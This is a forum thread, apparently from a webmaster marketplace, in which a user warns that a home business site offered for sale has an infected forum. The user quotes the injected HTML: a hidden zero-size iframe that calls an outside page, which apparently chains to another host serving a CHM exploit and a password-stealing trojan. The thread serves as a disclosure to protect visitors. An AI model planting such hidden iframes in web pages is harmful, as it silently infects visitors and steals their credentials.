Membership is FREE – with unlimited access to all features, tools, and discussions. Premium accounts get benefits like banner ads and newsletter exposure. ✅ Signature links are now free for all. 🚫 No AI-generated (LLM) posts allowed. Share your own thoughts and experience — accounts may be terminated for violations.
Offers PR 3/4 home business site for sale
- Thread starter ceint
- Start date
- Status
- Joined
- Jan 13, 2005
- Messages
- 211
- Reaction score
- 0
Whoever has visited the forum of this site please immediately check C:\WINDOWS\SYSTEM32\MSET_pass.log and see if you get the same result as me. I have received some spyware and it was when I visited this site.
- Joined
- Sep 16, 2003
- Messages
- 192
- Reaction score
- 0
I have checked the phpbb forum and can not find any evidence that it is from there you got it.
All PM's have been repsonded to..
Current high bid $255
Site will be sold to the higest bidder today.
All PM's have been repsonded to..
Current high bid $255
Site will be sold to the higest bidder today.
- Joined
- Jan 13, 2005
- Messages
- 211
- Reaction score
- 0
Let me break it down for you then because I do a bit of work in this area. NOTE No one should visit these sites with an activeX enabled IE.ceint said:
Your forum page calls this page in an iframe
http://howtoloseweight.frsa.com/index.php
that page forwards to another page http://www.chercher.org/1.htm
via another iframe that then loads a chm exploit and installs a trojan that will pick up system passwords.
This is the section of the code that does it
Code:
<span class="gen">Work At Home Business Forums - Let's Talk Business...<iframe src="[url="http://howtoloseweight.frsa.com/index.php"]http://howtoloseweight.frsa.com/index.php[/url]" height="0" width="0" frameborder="1"></iframe></span></B></FONT></P>Again I state anyone who has visited those forums check your windows\system32\ folder for a folder called mset, your passwords may have been compromised.
If any other IT person would like to dispute my claims or back them up please feel free to do so.
The google cache is from the 26th of April so not fresh
http://66.102.7.104/search?q=cache:9uonHz_IQwkJ:www.homebusiness.us.com/forum/+&hl=en
do a view source and ctrl+f for "iframe" no quotes. Then check out the site it forwards once, then hits chercher.org and tries to run the exploit.
- Joined
- Feb 20, 2003
- Messages
- 15,041
- Reaction score
- 1,192
Ceint,
What is the scoop with this, was there some way something was installed through activex?
Anyone else have any issue with this?
-=DCG=-
What is the scoop with this, was there some way something was installed through activex?
Anyone else have any issue with this?
-=DCG=-
- Status
Similar threads
